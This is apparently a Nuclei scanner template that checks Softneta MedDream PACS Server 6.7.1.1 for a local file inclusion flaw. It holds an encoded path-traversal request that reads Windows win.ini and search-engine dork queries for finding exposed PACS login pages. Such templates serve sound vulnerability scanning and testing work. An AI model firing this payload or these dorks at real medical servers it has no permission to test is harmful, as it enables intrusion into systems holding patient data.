id: sofneta-mecdream-pacs-lfi

info:
  name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/45347
    - https://www.softneta.com/products/meddream-pacs-server/downloads.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    google-query: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
  tags: sofneta,lfi,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by mp on 2022/08/04
